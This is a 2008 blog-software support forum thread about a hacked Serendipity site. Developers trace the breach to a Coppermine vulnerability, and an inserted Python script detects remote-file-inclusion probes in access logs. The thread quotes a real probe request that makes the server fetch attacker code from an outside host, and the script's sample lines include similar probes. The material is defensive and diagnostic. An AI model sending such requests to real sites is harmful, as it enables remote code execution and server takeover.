Possible execution of malicious code

Shaun.Mitchell
Posts: 3
Joined: Wed Jan 02, 2008 8:55 pm

Post by Shaun.Mitchell »

My Serendipity blog was hacked today and my hosting provider is saying that it is a bug with Serendipity (don't all hosting providers blame the software and not their server :))

I'm not sure if this is possible but this is what they are saying was run:

GET /blog/index.php?/archives/24MCTSSQLServer2005.html27kfl209.85.165.104/cache:uRVO84x_ygMJ:www.verticalevolution.com/blog/index.php3F/archives/24MCTSSQLServer2005.html=http://www.dreamplay.com.br/PSD/x.txt?

This is the key: http://www.dreamplay.com.br/PSD/x.txt looking at this it's a script that runs commands against the server and sends the results to an IRC channel.

Any thoughts on this from anyone? I'm hoping it's a server issue and not a serendipity issue.
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Re: Possible execution of malicious code

Post by garvinhicking »

Hi!

I tried to reproduce this, but using my own URLs this doesn't really work.

Actually, I don't think there's a place where Serendipity can include remote HTTP URL code as a PHP include command, so I don't see any vulnerability here.

I agree the URL looks like a hack, but to me it does not seem to do anything.

Instead of "http://www.dreamplay.com.br/PSD/x.txt" I created my own file: http://garv.in/test.txt -- if it had worked, on the vulnerable server an "/tmp/evil.txt" file would have been created, which is not the case.

Which serendipity version were you using? Was any other software running on your website, apart from Serendipity? It seems the URL is just a usual attack of remote software that tries to append its URL to see if remote code is executed.

What puzzles me is this "MCTSSQLServer2005" stuff. This seems to stem from a hack attack where people tried to exploit the vulnerability in the Microsoft SQL Server, which does surely not work with Serendipity. ;)

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
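The probe Garvin describes, a query string with a foreign http URL appended to see whether the application will fetch and include it, leaves a recognisable trace in the web server access log. The script below is an added example, not code from the thread or from Serendipity: it scans constructed Apache-style log lines (the first imitates the shape of the request quoted above) and reports every request whose query carries an absolute URL to a host other than your own. The log lines, IPs and the `own_hosts` list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not taken from any real server). Line 1
# mirrors the quoted request: a query value that is itself a remote .txt URL
# with a trailing "?". Line 4 points at the site's own host and is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jan/2008:10:00:01 +0000] "GET /blog/index.php?/archives/24.html=http://www.dreamplay.com.br/PSD/x.txt? HTTP/1.1" 200 5120
203.0.113.6 - - [02/Jan/2008:10:00:02 +0000] "GET /blog/index.php?/archives/24.html HTTP/1.1" 200 5120
203.0.113.7 - - [02/Jan/2008:10:00:03 +0000] "GET /gallery/index.php?file=http%3A%2F%2Fexample.org%2Fshell.txt%3F HTTP/1.1" 200 300
203.0.113.8 - - [02/Jan/2008:10:00:04 +0000] "GET /blog/index.php?url=https://www.verticalevolution.com/page HTTP/1.1" 200 100
"""

# Request line inside the common log format: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# An absolute http(s) URL embedded anywhere in the (decoded) query string.
URL_RE = re.compile(r"https?://[^\s\"'<>&]+")


def rfi_candidates(log_text, own_hosts=()):
    """Return (client_ip, remote_url) for each request whose query string
    carries an absolute http(s) URL to a foreign host, the usual shape of a
    remote-file-inclusion probe. Hosts in own_hosts are treated as benign."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        # Decode percent-encoding first so "http%3A%2F%2F" is seen as a URL too.
        target = unquote(m.group("target"))
        query = urlsplit(target).query
        # Serendipity-style "?/archives/..." queries have no key=value pairs, so
        # scan the raw query text instead of parsing it into parameters.
        for url in URL_RE.findall(query):
            host = urlsplit(url).hostname
            if host and host.lower() not in own:
                hits.append((client, url))
    return hits


if __name__ == "__main__":
    for client, url in rfi_candidates(SAMPLE_LOG, own_hosts=("www.verticalevolution.com",)):
        print(f"possible RFI probe from {client}: {url}")
```

A hit only shows that the probe was attempted; whether anything was included is a separate question, which is why checking for the side effect the payload would have produced (as Garvin did with his test file) is the right follow-up.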
Shaun.Mitchell
Posts: 3
Joined: Wed Jan 02, 2008 8:55 pm

Post by Shaun.Mitchell »

Thanks for the quick reply. I was running version 1.2.1 but just finished upgrading. The SQLServer stuff was a blog post of mine with that title. I really didn't think that there was a case of them being able to run executable code in the URL but just wanted to make sure. I have the integration into the coppermine photo gallery on the site as well.

Thanks again.
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Post by garvinhicking »

Hi!

I believe Coppermine exploits have been around the last couple of days. This seems like a good suspect!

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
judebert
Regular
Posts: 2478
Joined: Sat Oct 15, 2005 6:57 am
Location: Orlando, FL

Post by judebert »

Indeed, on the Coppermine home page they indicate an SQL injection vulnerability only a month old. If you had a version older than 1.4.18, it was vulnerable and needs to be upgraded.
Judebert
---
Website | Wishlist | PayPal